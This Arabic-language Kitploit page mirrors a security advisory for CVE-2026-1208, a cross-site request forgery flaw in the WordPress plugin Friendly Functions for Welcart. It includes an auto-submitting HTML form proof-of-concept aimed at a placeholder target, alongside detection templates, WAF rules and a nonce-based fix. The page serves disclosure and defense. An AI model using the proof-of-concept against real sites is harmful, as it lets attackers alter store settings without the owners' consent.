Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - تزوير الطلب عبر المواقع لتحديث الإعدادات | Kitploit
أدوات/GitHubGitHub/snailsploit/cve-2026-1208
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - تزوير الطلب عبر المواقع لتحديث الإعدادات

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1208: تزوير الطلبات عبر المواقع (CSRF) في Friendly Functions for Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

الكلمات المفتاحية: CVE-2026-1208، ثغرة Friendly Functions for Welcart، CSRF، تزوير الطلبات عبر المواقع، أمان WordPress، ثغرة إضافة WordPress، CWE-352، أمان Welcart، التلاعب بالإعدادات، WordPress CVE 2026

جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • التحليل الفني
  • متجه الهجوم
  • إثبات المفهوم
  • دليل المعالجة
  • مقاييس CVSS
  • المراجع
  • اتصال الأمان

نظرة عامة

ثغرة CSRF في إضافة Friendly Functions for Welcart لووردبريس (CVE-2026-1208) - خلل أمني يسمح للمهاجمين غير المصادَق عليهم بتعديل إعدادات الإضافة عبر طلبات مزوّرة.

تم اكتشاف ثغرة تزوير الطلبات عبر المواقع (CSRF) في إضافة Friendly Functions for Welcart تسمح للمهاجمين غير المصادَق عليهم بتحديث إعدادات الإضافة عبر خداع مسؤول الموقع للنقر على رابط ضار.

اكتشفها: Kai Aizen (SnailSploit)
نُشرت في: 23 يناير 2026
درجة CVSS: 4.3 (متوسطة)
CWE: CWE-352 - تزوير الطلبات عبر المواقع (CSRF)
الإضافة: Friendly Functions for Welcart
نوع الهجوم: تزوير الطلبات عبر المواقع لتحديث الإعدادات
الصلاحيات المطلوبة: لا شيء (هجوم غير مصادَق عليه + هندسة اجتماعية)

تفاصيل الثغرة

الوصف

إضافة Friendly Functions for Welcart لووردبريس عرضة لتزوير الطلبات عبر المواقع في جميع الإصدارات حتى 1.2.5. يعود السبب إلى غياب أو عدم صحة التحقق من nonce في صفحة الإعدادات. وهذا يجعل من الممكن للمهاجمين غير المصادَق عليهم تحديث إعدادات الإضافة عبر طلب مزوّر، بشرط تمكنهم من خداع مسؤول الموقع لتنفيذ إجراء مثل النقر على رابط.

التأثير

تسمح هذه الثغرة للمهاجمين غير المصادَق عليهم بما يلي:

  • تعديل إعدادات الإضافة دون إذن
  • التلاعب بوظائف التجارة الإلكترونية في Welcart
  • احتمال تعطيل عمليات المتجر
  • الربط مع ثغرات أخرى لشن هجمات موسّعة

الإصدارات المتأثرة

  • المتأثرة: جميع الإصدارات ≤ 1.2.5
  • المُصحَّحة: الإصدار 1.2.6 وما فوق

مقاييس CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

التحليل الفني

توجد الثغرة في تنفيذ صفحة الإعدادات حيث:

  1. يفتقر نموذج إعدادات الإضافة إلى التحقق السليم من nonce
  2. تتم معالجة طلبات تحديث الإعدادات دون التحقق من مصدر الطلب
  3. لا يتم إنشاء رموز CSRF أو التحقق منها
  4. يمكن تنفيذ إجراءات إدارية عبر طلبات من مصادر خارجية (cross-origin)

مواقع الكود المتأثر

تم تحديد الثغرة في المواقع التالية:

  • ffw_function_settings.php - السطر 53
  • ffw_function_settings.php - السطر 58

متجه الهجوم

يتطلب الهجوم هندسة اجتماعية لخداع مسؤول مصادَق عليه لزيارة صفحة ضارة أو النقر على رابط مُصمَّم خصيصًا أثناء تسجيل دخوله إلى موقع WordPress الخاص به.

root@kitploit:~
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page

إثبات المفهوم

حمولة HTML الخاصة بـ CSRF

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ تحذير: تم توفير إثبات المفهوم هذا لأغراض تعليمية وللاختبارات المرخّصة فقط.

خطوات الاختبار

  1. قم بإعداد نسخة WordPress مثبّت عليها Friendly Functions for Welcart <= 1.2.5
  2. استضف حمولة CSRF على خادم يتحكم فيه المهاجم
  3. سجّل الدخول كمسؤول على موقع WordPress المستهدف
  4. قم بزيارة الصفحة التي يتحكم فيها المهاجم (محاكاةً للنقر على رابط ضار)
  5. لاحظ أن إعدادات الإضافة تُعدَّل دون موافقة صريحة

الاكتشاف

فحص إضافة WordPress

root@kitploit:~
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version

قواعد الماسح الأمني

قالب Nuclei:

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable 
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

قواعد جدار حماية تطبيقات الويب (WAF)

قاعدة ModSecurity:

root@kitploit:~
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

قاعدة Nginx:

root@kitploit:~
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # Pass to PHP handler
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

المعالجة

لمسؤولي الموقع

إجراء فوري مطلوب:

  1. قم بتحديث Friendly Functions for Welcart إلى الإصدار 1.2.6 أو أحدث فورًا
  2. راجع إعدادات الإضافة في موقعك للتحقق من أي تعديلات غير مصرح بها
  3. إذا لم تتمكن من التحديث فورًا، ففكّر في تعطيل الإضافة مؤقتًا

تعليمات التحديث

  1. انتقل إلى الإضافات > الإضافات المثبَّتة في لوحة تحكم WordPress
  2. ابحث عن "Friendly Functions for Welcart"
  3. انقر على تحديث الآن للترقية إلى الإصدار 1.2.6 أو أحدث
  4. تحقق من نجاح التحديث
  5. راجع وتأكد من صحة إعدادات الإضافة

للمطوّرين

تأكد من أن جميع نماذج الإعدادات تطبّق حماية CSRF مناسبة:

root@kitploit:~
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // Process settings update
    // ...
}

الجدول الزمني

  • 23 يناير 2026 - تم الكشف عن الثغرة علنًا
  • 23 يناير 2026 - تم تخصيص CVE-2026-1208
  • الإصدار 1.2.6 - تم إصدار التصحيح من قِبل مطوّر الإضافة

المراجع

  • إدخال قاعدة بيانات Wordfence Intelligence
  • WordPress Plugin Trac - السطر 53
  • WordPress Plugin Trac - السطر 58
  • تغييرات الإضافة (التصحيح)
  • إدخال CVE في MITRE

الاعتمادات

الباحث:

  • Kai Aizen - SnailSploit

عملية الإفصاح: تم التنسيق من خلال برنامج Wordfence لمكافآت اكتشاف الثغرات

إخلاء المسؤولية

يتم توفير هذه المعلومات لأغراض البحث الأمني والأغراض الدفاعية فقط. أي استغلال لهذه الثغرة لأغراض ضارة يعد غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على إذن مناسب قبل اختبار أنظمة لا تملكها.

الاتصال

للاستفسارات أو المعلومات الإضافية حول هذه الثغرة:

  • البريد الإلكتروني: [email protected]
  • الموقع الإلكتروني: snailsploit.com
  • الجهة: SnailSploit Security Research

آخر تحديث: 23 يناير 2026


📚 التوثيق والمؤلف

التوثيق الكامل لهذا المشروع، والمنهجية، والأبحاث ذات الصلة متاحة على:

https://snailsploit.com/security-research/cves/cve-2026-1208/

أُنشئ بواسطة Kai Aizen — باحث أمني هجومي مستقل.

snailsploit.com · الأبحاث · الأطر · GitHub · LinkedIn · ResearchGate · X/Twitter

الهجوم نفسه. ركيزة مختلفة.

تنزيل الأداة
المقياسالقيمة
متجه الهجومشبكة (AV:N)
تعقيد الهجوممنخفض (AC:L)
الصلاحيات المطلوبةلا شيء (PR:N)
تفاعل المستخدممطلوب (UI:R)
النطاقغير متغير (S:U)
السريةلا شيء (C:N)
السلامةمنخفضة (I:L)
التوفرلا شيء (A:N)